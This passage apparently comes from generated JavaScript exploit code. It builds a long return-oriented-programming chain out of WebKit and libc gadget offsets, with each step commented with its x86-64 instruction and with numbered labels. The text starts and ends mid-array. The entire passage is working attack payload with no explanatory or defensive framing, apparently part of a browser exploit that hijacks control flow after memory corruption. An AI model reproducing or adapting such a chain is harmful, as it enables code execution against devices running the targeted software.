webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+224824, //L3951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+224808, //L3950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3949: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3950: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3951: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+224928, //L3954 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+224960, //L3956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3953: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3954: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3955: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3956: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+225072, //L3957+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+225064, //L3957 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L3957: db([0, 0]); // 0x0 set_gadgets([ ropchain+225088, //L3957+24 ropchain+226480, //L3952 libc_base+764760, //pop rsi ropchain+225128, //L3958 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3958: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3960: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+225248, //L3963 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225232, //L3961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3961: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3963: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+225392, //L3966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225360, //L3964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225376, //L3965 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3964: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3965: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3966: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+225472, //L3967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L3967: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3969: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+225592, //L3972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225576, //L3970 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3970: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3972: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+225768, //L3975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi 
ropchain+225784, //L3976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+225736, //L3973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225752, //L3974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3973: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3974: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3975: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3976: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+225944, //L3980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+225912, //L3978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+225928, //L3979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3977: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L3978: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3979: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3980: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+226032, //L3981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226048, //L3982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L3981: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3982: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al 
webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+226224, //L3984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226240, //L3985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+226208, //L3983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3983: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3985: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+226384, //L3988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226400, //L3989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+226352, //L3986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3986: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3987: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3988: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3989: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+226472, //L3990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L3990: db([0, 0]); // 0x0 //L3952: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+226600, //L3993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226616, //L3994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi 
libc_base+764760, //pop rsi ropchain+226584, //L3992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L3992: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L3993: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L3994: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+226776, //L3999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+226792, //L4000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+226728, //L3996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L3996: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L3997: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L3998: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L3999: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4000: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+226904, //L4001+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+226896, //L4001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4001: db([0, 0]); // 0x0 set_gadgets([ ropchain+226920, //L4001+24 ropchain+227872, //L3995 libc_base+764760, //pop rsi ropchain+226960, //L4002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4002: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4004: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+227080, //L4007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227064, //L4005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4005: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4007: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+227224, //L4010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227192, //L4008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227208, //L4009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4008: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4010: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227320, //L4012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4011: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L4012: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4013: db([32, 0]); // 0x20 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+227424, //L4014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227440, //L4015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4014: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4015: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ 
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+227616, //L4017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227632, //L4018 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227600, //L4016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4016: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4017: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4018: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+227776, //L4021 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+227792, //L4022 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+227744, //L4019 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4019: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4020: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L4021: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4022: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+227864, //L4023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4023: db([0, 0]); // 0x0 //L3995: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+227992, //L4026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228008, 
//L4027 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+227976, //L4025 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4025: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4026: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4027: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228120, //L4029 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228168, //L4032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228136, //L4030 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4029: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4030: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4031: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4032: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+228280, //L4033+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+228272, //L4033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L4033: db([0, 0]); // 0x0 set_gadgets([ ropchain+228296, //L4033+24 ropchain+230320, //L4028 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+228336, //L4034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L4034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4035: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L4036: db([48, 0]); // 0x30 set_gadgets([ webkit_base+15691302, //movsxd rax, edi 
libc_base+764760, //pop rsi ropchain+228528, //L4040 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+228496, //L4038 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228512, //L4039 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4037: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L4038: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4039: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4040: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+228584, //L4042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L4042: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+228712, //L4044 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+228728, //L4045 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228696, //L4043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4043: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L4044: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4045: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+228824, //L4047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+228808, //L4046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4046: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4047: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 
set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+228904, //L4048 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4048: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4050: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229024, //L4053 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229008, //L4051 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4051: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4053: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+229168, //L4056 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229136, //L4054 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+229152, //L4055 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4054: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4055: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4056: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+229240, //L4058 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4058: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229296, //L4059 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4059: db([0, 0]); // 0x0 
set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229376, //L4061 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4061: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4063: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229496, //L4066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229480, //L4064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4064: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4066: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+229640, //L4069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+229608, //L4067 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+229624, //L4068 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4067: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4068: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4069: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+229728, //L4071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L4070: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L4071: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+229784, //L4072 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4072: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4074: db([56, 0]); // 0x38 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+229864, //L4076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4076: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+229968, //L4077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+229984, //L4078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4077: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4078: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+230072, //L4080 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4080: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+230128, //L4081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4081: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+230200, //L4084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4084: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+230256, //L4085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4085: db([0, 0]); // 0x0 set_gadgets([ webkit_base+1121481, //mov [rax], cl libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+230336, //L4087 //L4028: libc_base+782311, //pop rsp ropchain+230352, //L4088 //L4087: libc_base+782311, //pop rsp ropchain+223984, //L3929 //L4088: //L3641: libc_base+764760, //pop rsi ropchain+230392, //L4089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L4089: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L4091: db([96, 0]); // 0x60 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+230512, //L4094 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+230496, //L4092 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L4092: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4094: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+230688, //L4097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+230704, //L4098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+230656, //L4095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+230672, //L4096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L4095: db([0, 0]); // 0x0 
set_gadget(webkit_base+3236123,); //pop r9 //L4096: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L4097: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4098: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+230800, //L4100 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+230784, //L4099 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L4099: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L4100: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4101: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L4102: db([4, 0]); // 0x4 set_gadget(libc_base+763368,); //pop rcx //L4103: db([4, 0]); // 0x4 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 